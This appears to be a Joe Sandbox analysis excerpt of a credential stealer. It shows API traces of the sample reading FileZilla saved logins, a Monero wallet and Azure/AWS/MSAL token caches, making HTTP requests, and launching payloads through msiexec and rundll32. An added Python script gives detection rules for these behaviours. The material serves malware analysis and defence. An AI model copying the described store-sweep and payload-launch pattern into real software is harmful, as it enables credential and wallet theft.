                               • Associated: 00000000.00000002.2170605095.00000000001F1000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.00000000001FD000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.0000000000222000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170605095.000000000038A000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000609000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.000000000062B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000635000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2170785783.0000000000643000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171090145.0000000000644000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171202100.00000000007E2000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000000.00000002.2171218839.00000000007E3000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              • Opcode ID: 2d7d25c5e385227c29a4a81fdf7237ea163a43f36440d3628bdb9a115d5de6e8
                              • Instruction ID: 1c795a3fa7afdd2a26a65381e310af313c1c2c2d0161f7004f04698f21191f52
                              • Opcode Fuzzy Hash: 2d7d25c5e385227c29a4a81fdf7237ea163a43f36440d3628bdb9a115d5de6e8
                              • Instruction Fuzzy Hash: 4A4146F3E086145BF344293DDD4A766BA96EBC4720F2B823CDA98C37C4E87D89064145
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000052E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170785783.000000000039E000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID:
                              • String ID:
                              • API String ID:
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001499C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 001499EC
                                • Part of subcall function 001499C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00149A11
                                • Part of subcall function 001499C0: LocalAlloc.KERNEL32(00000040,?), ref: 00149A31
                                • Part of subcall function 001499C0: ReadFile.KERNEL32(000000FF,?,00000000,0014148F,00000000), ref: 00149A5A
                                • Part of subcall function 001499C0: LocalFree.KERNEL32(0014148F), ref: 00149A90
                                • Part of subcall function 001499C0: CloseHandle.KERNEL32(000000FF), ref: 00149A9A
                                • Part of subcall function 00158E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00158E52
                              • GetProcessHeap.KERNEL32(00000000,000F423F,00160DBA,00160DB7,00160DB6,00160DB3), ref: 00150362
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00150369
                              • StrStrA.SHLWAPI(00000000,<Host>), ref: 00150385
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150393
                              • StrStrA.SHLWAPI(00000000,<Port>), ref: 001503CF
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 001503DD
                              • StrStrA.SHLWAPI(00000000,<User>), ref: 00150419
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150427
                              • StrStrA.SHLWAPI(00000000,<Pass encoding="base64">), ref: 00150463
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150475
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150502
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 0015051A
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 00150532
                              • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 0015054A
                              • lstrcat.KERNEL32(?,browser: FileZilla), ref: 00150562
                              • lstrcat.KERNEL32(?,profile: null), ref: 00150571
                              • lstrcat.KERNEL32(?,url: ), ref: 00150580
                              • lstrcat.KERNEL32(?,00000000), ref: 00150593
                              • lstrcat.KERNEL32(?,00161678), ref: 001505A2
                              • lstrcat.KERNEL32(?,00000000), ref: 001505B5
                              • lstrcat.KERNEL32(?,0016167C), ref: 001505C4
                              • lstrcat.KERNEL32(?,login: ), ref: 001505D3
                              • lstrcat.KERNEL32(?,00000000), ref: 001505E6
                              • lstrcat.KERNEL32(?,00161688), ref: 001505F5
                              • lstrcat.KERNEL32(?,password: ), ref: 00150604
                              • lstrcat.KERNEL32(?,00000000), ref: 00150617
                              • lstrcat.KERNEL32(?,00161698), ref: 00150626
                              • lstrcat.KERNEL32(?,0016169C), ref: 00150635
                              • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00160DB2), ref: 0015068E
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeap$AllocateCloseCreateFolderFreeHandlePathProcessReadSize
                              • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                              • API String ID: 1942843190-555421843
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 001447B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00144839
                                • Part of subcall function 001447B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00144849
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 001459F8
                              • StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00145A13
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00145B93
                              • lstrlen.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,00DDEA30,00000000,?,00DDA5C8,00000000,?,00161A1C), ref: 00145E71
                              • lstrlen.KERNEL32(00000000), ref: 00145E82
                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00145E93
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00145E9A
                              • lstrlen.KERNEL32(00000000), ref: 00145EAF
                              • lstrlen.KERNEL32(00000000), ref: 00145ED8
                              • lstrlen.KERNEL32(00000000,00000000,00000000), ref: 00145EF1
                              • lstrlen.KERNEL32(00000000,?,?), ref: 00145F1B
                              • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00145F2F
                              • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00145F4C
                              • InternetCloseHandle.WININET(00000000), ref: 00145FB0
                              • InternetCloseHandle.WININET(00000000), ref: 00145FBD
                              • HttpOpenRequestA.WININET(00000000,00DDEB10,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00145BF8
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • InternetCloseHandle.WININET(00000000), ref: 00145FC7
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrlen$Internet$lstrcpy$CloseHandle$HeapHttpOpenRequestlstrcat$AllocateConnectCrackFileProcessReadSend
                              • String ID: "$"$------$------$------
                              • API String ID: 874700897-2180234286
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 00158B60: GetSystemTime.KERNEL32(00160E1A,00DDA988,001605AE,?,?,001413F9,?,0000001A,00160E1A,00000000,?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 00158B86
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                              • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0014CF83
                              • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0014D0C7
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0014D0CE
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D208
                              • lstrcat.KERNEL32(?,00161478), ref: 0014D217
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D22A
                              • lstrcat.KERNEL32(?,0016147C), ref: 0014D239
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D24C
                              • lstrcat.KERNEL32(?,00161480), ref: 0014D25B
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D26E
                              • lstrcat.KERNEL32(?,00161484), ref: 0014D27D
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D290
                              • lstrcat.KERNEL32(?,00161488), ref: 0014D29F
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D2B2
                              • lstrcat.KERNEL32(?,0016148C), ref: 0014D2C1
                              • lstrcat.KERNEL32(?,00000000), ref: 0014D2D4
                              • lstrcat.KERNEL32(?,00161490), ref: 0014D2E3
                                • Part of subcall function 0015A820: lstrlen.KERNEL32(00144F05,?,?,00144F05,00160DDE), ref: 0015A82B
                                • Part of subcall function 0015A820: lstrcpy.KERNEL32(00160DDE,00000000), ref: 0015A885
                              • lstrlen.KERNEL32(?), ref: 0014D32A
                              • lstrlen.KERNEL32(?), ref: 0014D339
                                • Part of subcall function 0015AA70: StrCmpCA.SHLWAPI(00DD9000,0014A7A7,?,0014A7A7,00DD9000), ref: 0015AA8F
                              • DeleteFileA.KERNEL32(00000000), ref: 0014D3B4
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTime
                              • String ID:
                              • API String ID: 1956182324-0
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                                • Part of subcall function 0015A920: lstrcpy.KERNEL32(00000000,?), ref: 0015A972
                                • Part of subcall function 0015A920: lstrcat.KERNEL32(00000000), ref: 0015A982
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
                                • Part of subcall function 0015A9B0: lstrlen.KERNEL32(?,00DD9140,?,\Monero\wallet.keys,00160E17), ref: 0015A9C5
                                • Part of subcall function 0015A9B0: lstrcpy.KERNEL32(00000000), ref: 0015AA04
                                • Part of subcall function 0015A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 0015AA12
                              • CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,00000000,?,00DDD568,00000000,?,0016144C,00000000,?,?), ref: 0014CA6C
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002), ref: 0014CA89
                              • GetFileSize.KERNEL32(00000000,00000000), ref: 0014CA95
                              • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0014CAA8
                              • ReadFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 0014CAD9
                              • StrStrA.SHLWAPI(?,00DDD628,00160B52), ref: 0014CAF7
                              • StrStrA.SHLWAPI(00000000,00DDD580), ref: 0014CB1E
                              • StrStrA.SHLWAPI(?,00DDDAC8,00000000,?,00161458,00000000,?,00000000,00000000,?,00DD9030,00000000,?,00161454,00000000,?), ref: 0014CCA2
                              • StrStrA.SHLWAPI(00000000,00DDD888), ref: 0014CCB9
                                • Part of subcall function 0014C820: lstrlen.KERNEL32(?,00000001,?,00000000,00000000,00000000), ref: 0014C871
                                • Part of subcall function 0014C820: CryptStringToBinaryA.CRYPT32(?,00000000), ref: 0014C87C
                              • StrStrA.SHLWAPI(?,00DDD888,00000000,?,0016145C,00000000,?,00000000,00DD9070), ref: 0014CD5A
                              • StrStrA.SHLWAPI(00000000,00DD9180), ref: 0014CD71
                                • Part of subcall function 0014C820: lstrcat.KERNEL32(?,00160B46), ref: 0014C943
                                • Part of subcall function 0014C820: lstrcat.KERNEL32(?,00160B47), ref: 0014C957
                                • Part of subcall function 0014C820: lstrcat.KERNEL32(?,00160B4E), ref: 0014C978
                              • lstrlen.KERNEL32(00000000), ref: 0014CE44
                              • CloseHandle.KERNEL32(00000000), ref: 0014CE9C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Filelstrcat$lstrcpy$lstrlen$Pointer$BinaryCloseCreateCryptHandleReadSizeString
                              • String ID:
                              • API String ID: 3744635739-3916222277
                              • Opcode ID: 701e931a3639f4646218c22da25954e285b6a17e81df0e36e01f9df08b3be2d2
                              • Instruction ID: 1f40d9bb189e3702a7766a5cd3e5a6197305a7214afe2d1a4e0c854b02f1194a
                              • Opcode Fuzzy Hash: 701e931a3639f4646218c22da25954e285b6a17e81df0e36e01f9df08b3be2d2
                              • Instruction Fuzzy Hash: 56E11071940108EBDB15EBA0DC95FEEB778BF24302F804259F5166B191EF706A4ECB62
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • RegOpenKeyExA.ADVAPI32(00000000,00DDB4F0,00000000,00020019,00000000,001605B6), ref: 001583A4
                              • RegEnumKeyExA.ADVAPI32(00000000,00000000,?,00000400,00000000,00000000,00000000,00000000), ref: 00158426
                              • wsprintfA.USER32 ref: 00158459
                              • RegOpenKeyExA.ADVAPI32(00000000,?,00000000,00020019,00000000), ref: 0015847B
                              • RegCloseKey.ADVAPI32(00000000), ref: 0015848C
                              • RegCloseKey.ADVAPI32(00000000), ref: 00158499
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CloseOpenlstrcpy$Enumwsprintf
                              • String ID: - $%s\%s$?
                              • API String ID: 3246050789-3278919252
                              • Opcode ID: d77bb2d9b6b38110f59ef07ede29aa41830e6c7496234c1bf2a5de70f60641e6
                              • Instruction ID: 57d5f7ccbddd791d2fad5c31c141971337a8159fe6fc2d2d30291351740de70d
                              • Opcode Fuzzy Hash: d77bb2d9b6b38110f59ef07ede29aa41830e6c7496234c1bf2a5de70f60641e6
                              • Instruction Fuzzy Hash: 3A814D71950218DBEB29DB50CC91FEA77BCBF18701F4082D9E519AA140DF716B89CFA1
                              APIs
                                • Part of subcall function 00158DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00158E0B
                              • lstrcat.KERNEL32(?,00000000), ref: 00154DB0
                              • lstrcat.KERNEL32(?,\.azure\), ref: 00154DCD
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 0015492C
                                • Part of subcall function 00154910: FindFirstFileA.KERNEL32(?,?), ref: 00154943
                              • lstrcat.KERNEL32(?,00000000), ref: 00154E3C
                              • lstrcat.KERNEL32(?,\.aws\), ref: 00154E59
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FDC), ref: 00154971
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,00160FE0), ref: 00154987
                                • Part of subcall function 00154910: FindNextFileA.KERNEL32(000000FF,?), ref: 00154B7D
                                • Part of subcall function 00154910: FindClose.KERNEL32(000000FF), ref: 00154B92
                              • lstrcat.KERNEL32(?,00000000), ref: 00154EC8
                              • lstrcat.KERNEL32(?,\.IdentityService\), ref: 00154EE5
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 001549B0
                                • Part of subcall function 00154910: StrCmpCA.SHLWAPI(?,001608D2), ref: 001549C5
                                • Part of subcall function 00154910: wsprintfA.USER32 ref: 001549E2
                                • Part of subcall function 00154910: PathMatchSpecA.SHLWAPI(?,?), ref: 00154A1E
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,00DDEB00), ref: 00154A4A
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,00160FF8), ref: 00154A5C
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,?), ref: 00154A70
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,00160FFC), ref: 00154A82
                                • Part of subcall function 00154910: lstrcat.KERNEL32(?,?), ref: 00154A96
                                • Part of subcall function 00154910: CopyFileA.KERNEL32(?,?,00000001), ref: 00154AAC
                                • Part of subcall function 00154910: DeleteFileA.KERNEL32(?), ref: 00154B31
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcat$File$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                              • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                              • API String ID: 949356159-974132213
                              • Opcode ID: b51281107ed0c1b43c9d1cd76a506178d03e4dc57769874c8f57838ad5c09e53
                              • Instruction ID: 9361ef9b8e1d3d2692f0759c545fa4a51904f34d7e9fd00f0ac4157ed80e1366
                              • Opcode Fuzzy Hash: b51281107ed0c1b43c9d1cd76a506178d03e4dc57769874c8f57838ad5c09e53
                              • Instruction Fuzzy Hash: 4C4183B9940204B7DB10F770EC47FEA3638AB24705F404594B6456A0C1EFB45BDD8BA2
                              APIs
                              • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0015906C
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: CreateGlobalStream
                              • String ID: image/jpeg
                              • API String ID: 2244384528-3785015651
                              • Opcode ID: 2e1a8b208fb22641f8c094d1b2d96a997cc2d375403635a9dede1f5ecd513acd
                              • Instruction ID: 8a3d30630fc555663f8256c2b707f8c440762adb99d0dbcbb9cf42bf1389d905
                              • Opcode Fuzzy Hash: 2e1a8b208fb22641f8c094d1b2d96a997cc2d375403635a9dede1f5ecd513acd
                              • Instruction Fuzzy Hash: 3171E971910608EBDB04DFE4DC89FEEBBBCAB48301F108549F616AB294DB34A945CB61
                              APIs
                                • Part of subcall function 0015A740: lstrcpy.KERNEL32(00160E17,00000000), ref: 0015A788
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001531C5
                              • ShellExecuteEx.SHELL32(0000003C), ref: 0015335D
                              • ShellExecuteEx.SHELL32(0000003C), ref: 001534EA
                              Strings
                              Memory Dump Source
                              • Source File: 00000000.00000002.2170605095.0000000000141000.00000040.00000001.01000000.00000003.sdmp, Offset: 00140000, based on PE: true
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_0_2_140000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell$lstrcpy
                              • String ID: /i "$ /passive$"" $.dll$.msi$<$C:\Windows\system32\msiexec.exe$C:\Windows\system32\rundll32.exe
                              • API String ID: 2507796910-3625054190
                              • Opcode ID: 9627090bddf08f7d978563fd09183734cf767a55164d72d2b1c62bfda28d9cb8
                              • Instruction ID: cabcc1c4dd62a876ca5786acfc4b572edb81c73d793de80598b52e2ebee0bb39
                              • Opcode Fuzzy Hash: 9627090bddf08f7d978563fd09183734cf767a55164d72d2b1c62bfda28d9cb8
                              • Instruction Fuzzy Hash: 11120171850118DADB05EBA0DC92FDEB778AF24302F904259F9267A191EF742B4ECF52
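Two of the functions above give a defender concrete things to look for. The first (lstrcat of `\.azure\`, `\.aws\`, `\.IdentityService\`, FindFirstFileA over `*.*`, PathMatchSpecA against `msal.cache`, then CopyFileA and DeleteFileA) is a sweep of cloud CLI and MSAL token caches in the user profile, and the earlier file-read function carries `\Monero\wallet.keys`; a legitimate tool touches its own store, a stealer touches several in the same second. The second (three ShellExecuteEx calls with the strings `C:\Windows\system32\msiexec.exe`, `/i "`, ` /passive`, `C:\Windows\system32\rundll32.exe`, `.msi`, `.dll`) is the follow-on payload launcher. The Python below is an added example for this page, not code from the sample, Joe Sandbox or any vendor product. It runs two detections over constructed EDR-style telemetry: the store markers are taken from the strings in this report, while the event format, the sample lines, the 30-second window and the list of user-writable directories are our assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime
from typing import List

# Constructed EDR-style telemetry, not taken from the sandbox run. One event per
# line: timestamp|event|pid|image|target, where target is the file path for file
# events and the full command line for process_create.
SAMPLE_EVENTS = r"""
2024-10-24T10:00:01|file_read|4711|C:\Users\bob\AppData\Local\Temp\file.exe|C:\Users\bob\.azure\msal.cache
2024-10-24T10:00:01|file_read|4711|C:\Users\bob\AppData\Local\Temp\file.exe|C:\Users\bob\.aws\credentials
2024-10-24T10:00:02|file_read|4711|C:\Users\bob\AppData\Local\Temp\file.exe|C:\Users\bob\.IdentityService\msal.cache
2024-10-24T10:00:02|file_read|4711|C:\Users\bob\AppData\Local\Temp\file.exe|C:\Users\bob\AppData\Roaming\Monero\wallet.keys
2024-10-24T10:00:05|process_create|4720|C:\Windows\system32\msiexec.exe|C:\Windows\system32\msiexec.exe /i "C:\Users\bob\AppData\Local\Temp\upd.msi" /passive
2024-10-24T10:00:06|process_create|4721|C:\Windows\system32\rundll32.exe|C:\Windows\system32\rundll32.exe C:\Users\bob\AppData\Local\Temp\a.dll,Start
2024-10-24T10:30:00|file_read|5000|C:\Program Files\Amazon\AWSCLIV2\aws.exe|C:\Users\bob\.aws\credentials
2024-10-24T11:00:00|process_create|5100|C:\Windows\system32\msiexec.exe|C:\Windows\system32\msiexec.exe /i "C:\Windows\Installer\1a2b3c.msi" /passive
"""

# Credential-store markers: the path fragments come from this report's string
# list; the family names are ours.
STORE_PATTERNS = {
    "azure": re.compile(r"\\\.azure\\", re.I),
    "aws": re.compile(r"\\\.aws\\", re.I),
    "identityservice": re.compile(r"\\\.IdentityService\\", re.I),
    "msal": re.compile(r"msal\.cache$", re.I),
    "monero": re.compile(r"\\Monero\\wallet\.keys$", re.I),
}
# Assumption: payloads dropped by a stealer live under user-writable directories.
USER_WRITABLE = re.compile(r"\\(AppData|Temp|Downloads|Public|ProgramData)\\", re.I)
MSIEXEC_PASSIVE = re.compile(r'/i\s+"([^"]+\.msi)".*?/passive', re.I)
RUNDLL_ARG = re.compile(r"rundll32\.exe\s+(\S+?\.dll)", re.I)


def parse_events(text: str) -> List[dict]:
    events = []
    for line in text.strip().splitlines():
        ts, kind, pid, image, target = line.split("|", 4)
        events.append({"ts": datetime.fromisoformat(ts), "kind": kind,
                       "pid": int(pid), "image": image, "target": target})
    return events


def detect_credential_store_sweep(events: List[dict], window_s: int = 30, min_families: int = 2) -> List[dict]:
    """Flag a process that reads files from >= min_families distinct credential
    stores within window_s seconds. A single store (aws.exe reading .aws) passes."""
    per_pid = defaultdict(list)
    for ev in events:
        if ev["kind"] != "file_read":
            continue
        for family, pat in STORE_PATTERNS.items():
            if pat.search(ev["target"]):
                per_pid[ev["pid"]].append((ev["ts"], family, ev["image"]))
    hits = []
    for pid, touches in per_pid.items():
        touches.sort()
        for i, (t0, _, image) in enumerate(touches):
            fams = {f for t, f, _ in touches[i:] if (t - t0).total_seconds() <= window_s}
            if len(fams) >= min_families:
                hits.append({"pid": pid, "image": image, "stores": sorted(fams)})
                break
    return hits


def detect_payload_launch(events: List[dict]) -> List[dict]:
    """Flag msiexec /i "<user-writable .msi>" /passive and rundll32 <user-writable .dll>,
    the two launch shapes visible in the ShellExecuteEx strings above."""
    hits = []
    for ev in events:
        if ev["kind"] != "process_create":
            continue
        cmd, image = ev["target"], ev["image"].lower()
        if image.endswith("\\msiexec.exe"):
            m = MSIEXEC_PASSIVE.search(cmd)
            if m and USER_WRITABLE.search(m.group(1)):
                hits.append({"pid": ev["pid"], "loader": "msiexec", "payload": m.group(1)})
        elif image.endswith("\\rundll32.exe"):
            m = RUNDLL_ARG.search(cmd)
            if m and USER_WRITABLE.search(m.group(1)):
                hits.append({"pid": ev["pid"], "loader": "rundll32", "payload": m.group(1)})
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_EVENTS)
    for hit in detect_credential_store_sweep(evs) + detect_payload_launch(evs):
        print(hit)
```

The sweep rule keys on breadth rather than on any one path, because each store in the list has a legitimate reader (az, aws, Office or Teams for msal.cache, the Monero wallet). The launch rule needs the payload path as well as the loader, since `msiexec /i … /passive` from `C:\Windows\Installer` is ordinary patching; the pairing of a system loader with a user-writable `.msi` or `.dll` is what separates the stealer's second stage from that noise.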
                              APIs
                                • Part of subcall function 0015A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0015A7E6
                                • Part of subcall function 00146280: InternetOpenA.WININET(00160DFE,00000001,00000000,00000000,00000000), ref: 001462E1
                                • Part of subcall function 00146280: StrCmpCA.SHLWAPI(?,00DDEAA0), ref: 00146303
                                • Part of subcall function 00146280: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00146335
                                • Part of subcall function 00146280: HttpOpenRequestA.WININET(00000000,GET,?,00DDE578,00000000,00000000,00400100,00000000), ref: 00146385
                                • Part of subcall function 00146280: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 001463BF
                                • Part of subcall function 00146280: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 001463D1
                                • Part of subcall function 0015A8A0: lstrcpy.KERNEL32(?,00160E17), ref: 0015A905
